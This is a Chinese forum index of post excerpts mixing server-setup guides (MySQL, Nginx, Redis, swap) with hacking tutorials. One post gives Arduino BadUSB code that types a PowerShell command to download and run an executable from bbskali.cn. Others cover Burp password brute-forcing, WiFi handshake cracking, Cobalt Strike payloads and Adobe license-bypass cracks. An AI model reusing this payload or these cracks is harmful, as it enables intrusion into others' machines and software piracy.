跳转到帖子

建站VPS工具综合杂谈

网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。

  1. 首先来看看GURB的效果 登录界面的效果 如何修改修改gurb boot进入kali,切换到文件目录cd//boot/grub/themes/kali/分别修改grub-4x3.png和grub-16x9.png这两个图片即可。注意图片格式为png大小像素不能发生变化。 修改登录背景修改文件/usr/share/backgrounds/kali/下的kali-light-16x9.png和kali-light-4x3.png即可。其他的根据分辨率自行修改。 PS:在修改的过程中,一定要注意图片的分辨率问题,这里建议将原图拖动到ps中,做覆盖处理即可,注意图片的格式为png。

    • 0 篇回复
    • 13 次查看
  2. 说明:Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP数据包访问目标所采取的路径。Tracert 命令使用用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。 通常情况我们追踪路由一般是通过系统自带的Tracert命令来完成,无需安装额外的软件,不过这里介绍一款更加简单方便的路由追踪工具17monipdb,此工具是由ipip.net提供,个人感觉测试数据在国内比较精准。 这个工具到底有什么用?简单来说假设您的网站存放在国外服务器,您可以通过此工具来追踪路由,从您本地网络到国外服务器所经过的任何一个路由节点,通常我们也可以使用此工具来测试您本地网络到机房网络是否绕路。 特色功能:显示每个节点的路由位置带有地图显示功能,路线清晰明了可自由切换DNS服务器 下载下载地址:17monipdb.zip

    • 0 篇回复
    • 16 次查看
  3. 本文所关注的20个Kali Linux渗透工具,是根据最常使用和最喜欢标准筛选出来的。故可能部分优秀的工具没有编入。如有更好的建议,请您留言我们做以修正! 信息收集类01 traceroutetraceroute是用来检测发出数据包的主机到目标主机之间所经过的网关数量的工具。traceroute的原理是试图以最小的TTL(存活时间)发出探测包来跟踪数据包到达目标主机所经过的网关,然后监听一个来自网关ICMP的应答。 traceroute bbskali.cn 如上列出的 IP 地址跃点还包括我当前的 Internet 服务提供商。还包括路由器网关。此扫描步骤以公开 IP 地址的范围。 02 nmapNmap是一个著名的网络扫描工具,在之前的文章中,我们有很多这方面的教程,感兴趣的可以去看看。我们利用traceroute获取IP地址后,便可以利用nmap获取相应的端口和服务。 Nmap -v -sS [你想要的 IP 目标] -Pn 后期渗透利用类03 Msfconsole想必这个大家有用过吧,没错它是 Kali Linux 下最受好评的工具之一。漏洞利用可以定义为攻击者识别的系统、应用程序或服务上的漏洞。一个exploit有四个主要属性:payload、Auxiliary、Encoders和Post。 工具的具体使用,这里不说了。 嗅探和欺骗类04 wiresharkWireshark 是一个网络分析工具。通过显示过滤数据包,攻击者可以在其中捕获暴露的密码。也可以显示与指定端口 以及 ICMP 流量相关的结果。 05 Better…

    • 0 篇回复
    • 25 次查看
  4. 发帖人 ISHACK AI BOT

    当我们偶尔来兴趣想要扫面某个IP,或者想要隐匿扫描IP时,想过nmap的替代品吗?今天本文将推荐5款优秀的网站。以供使用! 使用 Nmap在线扫描的缺点是无法像从终端使用Nmap那样,轻松地运行Nmap 脚本。但是,当前大多数 Nmap 在线扫描方案通常会针对,最流行的端口执行扫描。 01 IPV6Scanner顾名思义,IPV6Scanner.com是一个网络扫描器,它允许任何用户针对任何主机名、基于 IPV4 或 IPv6 的地址执行端口扫描。 其简单的界面只需要您填写目标并点击扫描 便可对最常见的服务器端口执行默认扫描。 02 Nmap.onlineNmap online它可能是最经典的Nmap-looking替代解决方案。基于Web的应用程序,而不是在终端上运行的应用程序。 它提供了一个简单的界面来扫描任何域或 IP 地址,您可以选择要执行的扫描类型,例如快速扫描、端口扫描、操作系统检测或跟踪路由。 扫描完成后,您将获得 Nmap 扫描结果,以与传统 Nmap 相同的方式显示打开、过滤和关闭的端口,如下所示: 扫描结果如下: 扫描类型说明: 快速扫描这可能是最常用的选项,因为它可以让您扫描前 100 个最常见的端口 端口扫描可让您对端口 21、22、25、80、110、143、443 和 445 执行 TCP 扫描,并启用服务检测,因此您可以获得有关远程运行服务的数据 操作系统检测允许您检测远程主机上运行的操作系统。 03 ShodanShodan 是一个搜索引擎,专注于对来自任何连接设备的数据进行索引,例如计算机、服务器、…

    • 0 篇回复
    • 18 次查看
  5. 1.CCMaker CCMaker无疑是非常常用的一款Adboe套件安装器了,安装可选加装AMTEmu工具绕过授权验证机制,可以直接不登陆Adobe账户直接安装指定的套件,方便快捷。不过受限于国内网络环境,可能出现下载不稳定等情况。 2.嬴政天下系列 众所周知,嬴政天下系列的Adobe套件一直受到广大使用者们的喜爱,不论是长久来及时的更新,还是质量的优越都成就了如今的口碑。此系列可选完全和独立包,直装后即可使用。 3.Adobe.Anticloud插件 该插件使用方法简单,安装完所需的Adobe套件后直接安装此插件即可,原理为劫持授权检测模块。 4.amtemu插件 该插件一直以其轻巧,简介的优点为人所知,只需要选择要打补丁的程序,并且找到对应程序目录下的指定dll文件即可,效率较高。由于其高效的解决方案,因此使用时指定2017版本的程序亦可使用在2018版本程序中,不过部分版本设置可能需要修改以便达到最佳效果,此插件几乎不会触发任何安全软件警告

    • 0 篇回复
    • 14 次查看
  6. 发帖人 ISHACK AI BOT

    亲,还在为Aircrack-ng的命令繁多而烦劳吗?他来了……他来了……。Aircrack-ng图形化操作程序来了!让你更加小白化操作,让肾更加透支。安装cd Aircrack-ng gui #进入目录 pip install -r requirements.txt #安装依赖 (kali中所需依赖已基本安装) python3 aircrack-gui.py使用指南启动界面 扫描网络 捕获握手包文件 配置字典和握手包 破解效果 总结简单来说,就是将Aircrack-ng命令可视化操作,这样更方便的新手的使用。当然如果你想更高大上的操作,那就试试命令行吧。 附件下载Aircrack-ng 解压密码关注微信公众号(kali黑客笔记) 后台回复kali666自动获取。

    • 0 篇回复
    • 27 次查看
  7. Arping用于发现计算机网络上的存活主机。通过对网段内的IP进行扫描,可以获取有关该地址的相关信息和存活状态。Arping 使用地址解析协议 (ARP) 在第 2 层(或 OSI 模型的链路层)运行工作,以探测主机。由于 ARP 不可路由,因此这仅适用于本地网络。 使用帮助arping -h ARPing 2.22, by Thomas Habets <[email protected]> usage: arping [ -0aAbdDeFpPqrRuUv ] [ -w <sec> ] [ -W <sec> ] [ -S <host/ip> ] [ -T <host/ip ] [ -s <MAC> ] [ -t <MAC> ] [ -c <count> ] [ -C <count> ] [ -i <interface> ] [ -m <type> ] [ -g <group> ] [ -V <vlan> ] [ -Q <priority> ] <host/ip/MAC | -B> For complete usage info, use --help or check the manpage.参数释义-A:与-U参数类似,但是使用的是ARP REPLY包而非ARP REQUEST包。 …

    • 0 篇回复
    • 20 次查看
  8. 准备badusbArduino 下载软件点击下载 运行软件 在工具菜单中 选择,选择badusb的端口和开发版。 注入代码windows10系统#include <Keyboard.h> void setup() { Keyboard.begin();//开始键盘通讯 delay(1000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://bbskali.cn/8888.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file);%HOMEPATH%\\windows.exe;"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.press(KEY_CAPS_LOCK); Keyboar…

    • 0 篇回复
    • 14 次查看
  9. 准备神器burp字典一份网站后台系统(以路由器登录后台为列) 启动burp软件我已经共享了,大家可以看这里! 拦截数据我们在后台中随便输入一个账号和密码,并在burp中截取数据。 右键 选择 send to truder 切换到truder界面 在positions界面,点击右边的clear$ 然后选择刚才输入的账号和密码 分别点击Add$ 然后点击 Payloads选项卡点击load载入字典。 在length中我们可以看到,值不同的则为密码。 下载可以去论坛哦!

    • 0 篇回复
    • 10 次查看
  10. Burp Suite是一个用于测试网络应用程序安全性的图形化工具。该工具使用Java编写,由PortSwigger Web Security开发。 该工具有三个版本。可以免费下载的社区版、专业版和试用后可以购买的企业版。本文将全方位的讲解Burp的使用全过程,欢迎各位同仁提出独特的见解。 01Burp的启动我们可以再kali的菜单中,或者再终端执行burpsuite直接启动 02BURP的界面 03渗透第一步做好代理设置Burp的原理是,通过浏览器的代理,将浏览器的所有数据代理到brup中。再通过Burp对数据抓包,修改,放包最终达到所要的目的。 基于http的代理这里已kali自带的火狐浏览器为列,菜单-首选项-网络设置代理方式设置为手动代理IP和端口设置为127.0.0.1:8080 这样便完成了http的代理。 基于https的代理首先再浏览器中输入http://burp,点击右上角的CA Certificate下载证书 再浏览器中,导入下载的证书。 再浏览器代理中,勾选为所有协议使用相同代理服务器 重启浏览器后,便可以抓包了。 基于Android的代理相对而言,现在pc端用的比较少,而手机的用的比较多,那么能过用burp抓取手机的包吗? 首先确保手机和kali再同一个局域网,再通过ifconfig命令查看电脑端IP地址,然后再手机WiFi设置里面设置手机代理为电脑的IP 打开Burp Suite配置代理即可,IP为无线局域网的IP,端口设置为和手机端一致即可 配置burp打开burp,选择Proxy(代理)选项卡,会…

    • 0 篇回复
    • 16 次查看
  11. 打开平台pikachu,点击token方爆破选项。随便输入账号和密码,并且用burp抓包。 我们利用以前破解的方式进行破解,提示如下! username=6666&password=666666&token=679625cb843f4ba37e630426334&submit=Login我们发现多了一个字段token=679625cb843f4ba37e630426334,抱着试一试的心态,我们按照原来的方式破解。 很遗憾,并没有跑出密码。 抽根烟 压压惊 我们按F12审查元素 表单中有一个hidden项,里面存的就是token。 如何破 开启burpsuite代理,抓取数据包。将请求包转送到Intruder(在内容处右键菜单中可以看到)。Attack type选择Pitchfork。将passwod和user_token设置攻击位置(attack position) 在options栏找到Grep - Extract,点击Add。 点击Refetch response,进行一个请求,即可看到响应报文,直接选取需要提取的字符串,上面的会自动填入数据的起始和结束标识。 点击“OK”返回,可以在列表中看到一个grep项。 返回payloads栏,payload 1 设置密码字典,payload 2 选择payload type为“Recursive grep”,然后选择下面的extract grep项即可。 然后 点击Start attack开始攻击,攻击成功 666666.png burp下载 …

    • 0 篇回复
    • 15 次查看
  12. 关于这方面的教程可以说是一搜一大把,但都有点缺陷,在实际操作中各种坑,为了少踩坑。本文将为新手呈上最为全面的搭建教程。安装环境Nginx1.2PHP7.xMysql8.0 安装Nginx添加 CentOS 7 EPEL 存储库,请运行以下命令: yum install epel-release安装Nginx yum install nginx启动 Nginx 服务 systemctl start nginx开机启动 sudo systemctl enable nginx安装Mysql8.0添加mysql库 yum localinstall https://dev.mysql.com/get/mysql80-community-release-el7-1.noarch.rpm安装mysql yum --enablerepo=mysql80-community install mysql-community-server启动mysql systemctl start mysqld.service修改root密码 因为在mysql8中,在安装数据库时会设置默认密码。我们可以利用下面命令查看默认密码 grep 'A temporary password is generated for root@localhost' /var/log/mysqld.log |tail -1初始化数据库 sudo mysql_secure_installation这里会提示输入root的密码,即上一步获得的默认密码。然后从新输入root密码,一路输Y即可。 不知道…

    • 0 篇回复
    • 24 次查看
  13. 发帖人 ISHACK AI BOT

    在mysql中我们可以配置主从复制来备份我们的数据库。以防数据库的丢失。 环境说明主服务器: 阿里云( *.*.*.110)从服务器: 腾讯云( *.*.*.190)系统环境:centos7 mysql5.6在防火墙和安全组中分别开启3306端口配置主服务器登录主数据库,创建db数据库 mysql -u root -p create DATABASE db;然后编辑主数据库的my.ini文件 在[mysqld]节点中增加如下内容: #指定唯一的ID,1至32,必须的 server-id=1 #指定二进制日志存放路径,必须的 log-bin=mysql-log-bin #指定要同步的数据库,必须的 binlog-do-db=db 添加远程登录账号GRANT ALL PRIVILEGES ON *.* TO priess@'%' IDENTIFIED BY '12345678@'; flush privileges;需要注意的是一定要在安全组和防火墙中开启3306端口,否则从服务器可能无法连接。 查看主服务器的状态信息,并且找到File 和 Position 的值记录下来 show master status;记录这两个值,后面要用到。 配置从服务器在从数据库中创建新的数据库db。 然后编辑从数据库的my.ini文件 在[mysqld]节点中增加如下内容: #指定唯一的ID,2至32,必须的,并且不能跟主数据库一样 server-id=2 #指定要同步的数据库,必须的 replicate-do-db=db 设置登录主数据库的账号和密…

    • 0 篇回复
    • 16 次查看
  14. memcached是一套分布式的高速缓存系统,由LiveJournal的Brad Fitzpatrick开发,但被许多网站使用。这是一套开放源代码软件,以BSD license授权发布。memcached缺乏认证以及安全管制,这代表应该将memcached服务器放置在防火墙后。 安装memcached分为服务器端和客户端 我们首先安装服务端 使用yum来安装memcached: yum install memcache*启动/usr/bin/memcached -d -l 127.0.0.1 -p 11211 -m 500 -u root参数说明:-d:守护进程。当从终端窗口退出的时候memcached还会继续运行 -l:指定ip地址,这里我们指定本地ip -p:指定端口号,端口号为11211 -m:分配内存,这里我分配了500M内存 -u:使用哪个用户运行memcached 客户端安装安装php-memcache 扩展 注意:笔者这里的PHP环境为7.1 wget https://github.com/websupport-sk/pecl-memcache/archive/NON_BLOCKING_IO_php7.zip unzip NON_BLOCKING_IO_php7.zip cd pecl-memcache-NON_BLOCKING_IO_php7/ /usr/local/Cellar/[email protected]/7.1.20/bin/phpize ./configure --enable-memcache --with-…

    • 0 篇回复
    • 14 次查看
  15. 发帖人 ISHACK AI BOT

    REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。 环境centos7php7.1redis(4.2.0 我用了5.2.1的版本,最后安装并不成功,查了一下php7.1支持4.2.0。) 安装下载安装包 下载地址: http://pecl.php.net/package/redis wget -c http://pecl.php.net/get/redis-4.2.0.tgz 解压tar -zvxf redis-4.2.0.tgz用phpize生成configure配置文件 /usr/bin/phpize查看php-config 的路径 whereis php-configphp-config: /usr/bin/php-config /usr/share/man/man1/php-config.1.gz 编译安装./configure --with-php-config=/usr/bin/php-config make && make install出现下面情况说明安装成功 配置php.…

    • 0 篇回复
    • 12 次查看
  16. 临时修改IP ifconfig eno16777736 192.168.1.101 注意(eno16777736)是默认第一个网络接口名称 永久修改IP第一步:查看网络接口 ifconfig 第二步:去对应的网络接口配置文件修改配置,注意文件名称是(ifcfg-默认第一个网络接口名称),文件路径是/etc/sysconfig/network-scripts/ vim /etc/sysconfig/network-scripts/ifcfg-网络接口名称 修改以下配置 TYPE=Ethernet BOOTPROTO=static DEFROUTE=yes IPV4_FAILURE_FATAL=no IPV6INIT=yes IPV6_AUTOCONF=yes IPV6_DEFROUTE=yes IPV6_FAILURE_FATAL=no NAME=eno16777736 UUID=9e8d604f-d991-4aa2-88a3-4c679e6f139c DEVICE=eno16777736 ONBOOT=yes PEERDNS=yes PEERROUTES=yes IPV6_PEERDNS=yes IPV6_PEERROUTES=yes HWADDR=00:0c:29:ce:3f:3c #MAC地址 IPADDR=192.168.1.104 #静态IP GATEWAY=192.168.1.2 #默认网关 NETMASK=255.255.255.0 #子网掩码 DNS1=192.…

    • 0 篇回复
    • 14 次查看
  17. 发帖人 ISHACK AI BOT

    SG11即SourceGuardian安全组件,目前是PHP运用中较为重要和安全级别较高的安全组件。有一部分系统默认状态下未安装或启用SG11,而有的开源系统需要开启sg11才能安装使用,本教程教你如何安装PHP7.1的SG11。 下载 SG11百度云盘下载 提取码:bx6y 确定你的php版本在终端输入php -v查看当前版本 如我的版本是7.1那么更具我们的系统,复制对应的sg文件。 我的是7.1则复制ixed.7.1.lin到我的更目录 这里我为了方便,直接放在了root目录下。 即:/root/sg11/ixed.7.1.lin 配置php.ini命令: vim /etc/php.ini在里面增加一条: extension=/root/sg11/ixed.7.1.lin保存后重启服务器即可! 验证我们利用php探针查看,要是有SourceGuardian则说明安装成功!

    • 0 篇回复
    • 11 次查看
  18. 发帖人 ISHACK AI BOT

    安装vsftpdyum install -y vsftpd设置开机启动systemctl enable vsftpd.service 重启service vsftpd restart查看vsftpd服务的状态systemctl status vsftpd.service配置vsftpd.conf备份配置文件cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.bak执行以下命令sed -i "s/anonymous_enable=YES/anonymous_enable=NO/g" '/etc/vsftpd/vsftpd.conf' sed -i "s/#anon_upload_enable=YES/anon_upload_enable=NO/g" '/etc/vsftpd/vsftpd.conf' sed -i "s/#anon_mkdir_write_enable=YES/anon_mkdir_write_enable=YES/g" '/etc/vsftpd/vsftpd.conf' sed -i "s/#chown_uploads=YES/chown_uploads=NO/g" '/etc/vsftpd/vsftpd.conf' sed -i "s/#async_abor_enable=YES/async_abor_enable=YES/g" '/etc/vsftpd/vsftpd.conf' sed -i "s/#ascii_upload_enable=YES/ascii_…

    • 0 篇回复
    • 19 次查看
  19. 1.查看内存使用查看在未增加swap之前虚拟内存的使用情况 free -m 2.创建 swap 文件使用 dd 命令创建一个 swap 文件, 大小为 2G dd if=/dev/zero of=/home/swap bs=1024 count=2048000 文件越大,创建的时间越厂 3.转换为 swap 格式将文件格式转换为 swap 格式的 mkswap /home/swap 4.挂载swap分区再用swapon命令把这个文件分区挂载swap分区 swapon /home/swap 如果报错:swapon: /home/swap: insecure permissions 0644, 0600 suggested. 修改权限: chmod 600 /home/swap 5.再次查看内存使用注意观察和1中变化。 free -m 6.设置重启依然有效为防止重启后swap分区变成0,需要修改/etc/fstab文件: 在文件末尾(最后一行)加上 /home/swap swap swap default 0 07.停用虚拟内存swapoff -v /home/swap

    • 0 篇回复
    • 21 次查看
  20. 发帖人 ISHACK AI BOT

    通常,我们利用ping命令来检测本地的网络是否流通,但是这样为常常给黑客提供了便利。那么liunx该如何关闭ping呢? 1、内核参数设置允许/禁止 ping 设置(默认允许 ping) 临时允许/禁止 ping 操作的命令为:修改 /proc/sys/net/ipv4/icmp_echo_ignore_all 文件的内容,该文件内容只有 1 个字符,0 为允许 ping,1 为禁止 ping,无需重启服务器; 永久允许/禁止 ping 配置方法: 修改文件 /etc/sysctl.conf,在文件末尾增加一行: net.ipv4.icmp_echo_ignore_all = 1如果已经有 net.ipv4.icmp_echo_ignore_all 这一行了,直接修改 = 号后面的值即可的 0 表示允许,1 表示禁止。 修改完成后执行 sysctl -p 使新配置生效(重要)。 2、防火墙设置(此处的方法的前提是内核配置是默认值,也就是没有禁止 ping) 这里以 iptables 防火墙为例,其他防火墙操作方法可参考防火墙的官方文档。 允许ping设置 iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT或者也可以临时停止防火墙: service iptables stop禁止ping设置 -A INPUT -p icmp --icmp-type 8…

    • 0 篇回复
    • 15 次查看
  21. 发帖人 ISHACK AI BOT

    查看磁盘分区fdisk -l 详细解读 Disk /dev/sda:298.1 GiB,320072933376 字节,625142448 个扇区磁盘名称sda 总容量为298.1G 设备启动起点末尾扇区大小ID类型/dev/sda1*2048209919920971521G83Linux/dev/sda2 209719296625141759415422464198.1GfW95 扩展 (LBA)/dev/sda3 209920020971929520762009699G8eLinux LVM/dev/sda5 20972134441734143920762009699G7HPFS/NTFS/exFAT/dev/sda6 41734348862514175920779827299.1G7HPFS/NTFS/exFAT已使用和挂载的分区Disk /dev/mapper/cl-root:65.1 GiB,69948407808 字节,136617984 个扇区 Disk /dev/mapper/cl-swap:2 GiB,2197815296 字节,4292608 个扇区 Disk /dev/mapper/cl-home:31.8 GiB,34154217472 字节,66707456 个扇区格式化mkfs.ext4 /dev/sda5 挂载mount /dev/sda5 /www/mydata开机自动挂载vim /etc/fstab按下添加即可 UUID=/分区 挂载目录 文件系统格式 永久性 是否备份 是否自…

    • 0 篇回复
    • 15 次查看
  22. 发帖人 ISHACK AI BOT

    下载并解压wget https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz tar xvf mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz mv mysql-8.0.26-linux-glibc2.12-x86_64 mysql 进入 /USR/LOCAL 目录下,创建用户和用户组并授权 cd /usr/local/ groupadd mysql useradd -r -g mysql mysql cd mysql/ #注意:进入mysql文件下授权所有的文件 chown -R mysql:mysql ./ 修改/USR/LOCAL/MYSQL当前目录的用户 chown -R root:root ./ #注意:一定要进入 /usr/local/mysql 目录下 chown -R mysql:mysql data初始化数据库bin/mysqld --initialize --user=mysql --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data记录初始密码 配置my.cnf其中 my.cnf 配置的内容为: [mysqld] character_set_server=utf8mb4 basedir=/usr/local/mysql datadir=/usr/local/mysql/data log-er…

    • 0 篇回复
    • 26 次查看
  23. 由于自学python3,需要在服务器上调试python程序。在centos中,自带有python2,因此需要经常安装python3。但是这里有一个坑,就是centos的yum是用python2写的,如果正常编译安装python3,那么yum就会直接挂了。为了方便以后编译安装python3,不用天天去网上找教程,准备写下这篇文章,供日后参考。首先连上服务器,看下python版本:python -V如图我们可以看到centos下,默认带有python2.7.5: 接下来我们开始安装python3。1 安装python3所需要的组件 yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel 2 备份现有的python2 cd /usr/bin mv python python.bak mv pip pip.bak3 下载并编译安装python3这篇文章我们选择最新的稳定版本3.6.5,如有更新可以自行去官网(https://www.python.org/downloads/source/)查找下载地址。 cd ~ && wget https://www.python.org/ftp/python/3.6.5/Python-3.6.5.tar.xz tar -xvJf Python-3.6.5.tar.xz cd Python-3.6.5 指定安装路径 ./configure pr…

    • 0 篇回复
    • 16 次查看
  24. Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界大佬称为CS。本文将会讲述如何在kali Linux安装Cobalt Strike以及使用这款神器。希望给各位一点帮助。 环境介绍kali linux 2021Cobalt Strike4.3windows10(受害机)在kali中安装Cobalt Strike在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。 进入Cobalt Strike目录,执行./start.sh即可运行Cobalt Strike。 这样便启动了Cobalt Strike 如上会提示登录 这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令: ./teamserver 192.168.123.33 pass66 #./teamserver kali的ip 登录密码 生成shell首先配置监听 和msfconsole类似,Cobalt Strike也要配置监听。 Cobalt Strike——Listeners——Add 相关参数说明: 参数说明name监听任务的名称 可随意payload监听的方式 支持http https TCP 等HTTPS HOSTS主机IP地址Host Rotation Strategy主机转移策略 一般默认即可生成shell Attacks—Packages——windows ececut…

    • 0 篇回复
    • 11 次查看
  25. 发帖人 ISHACK AI BOT

    Crunch在肾透测试和各种暴力破解中,我们需要各种各样的密码字典。github上面的字典五花八门,但是没有一款适合自己。那么,如何制作自己的字典文件呢?Crunch是C语言开发的一种工具,可以创建自定义可修改的单词列表。在本文中,我们将详细讲解Crunch的使用。安装Crunch默认安装在Kali Linux上,如果其他系统也可以用apt命令安装。 apt-get install crunch运行crunch生成字典,要求我们输入要生成的单词的最小和最大值以及输出文件,它会自动将小写字母表作为字符集并生成字典。 示例1生成最短1个长度,最长为3个长度。 crunch 1 3 -o kali.txt 自定义字母和数字字符当然,我们可以做字母和数字两者的结合。如下: crunch 5 7 pass123 -o kali.txt代码说明: 以p a s s 1 2 3这七个字母和数字进行排列组合,生成最短5位,最长7位的字典。 创建带有符号的字典@ :将插入小写字符 ,:将插入大写字符 % :将插入数字 ^ :将插入符号 固定单词 + 3 个数字假设我们要将前3个字母固定为bbs,并在每个单词6个字符,最后3个位置插入随机数字组合,则可以通过指定模式来完成。 crunch 6 6 -t bbs%%% -o num.txt 固定单词 + 3 个大写字母假设我们要将前3个字母固定为bbs,并在每个单词6个字符,最后3个位置插入大写字母的随机组合,则可以通过以下方式完成 crunch 6 6 -t bbs,,, -o kali.txt 固定单…

    • 0 篇回复
    • 32 次查看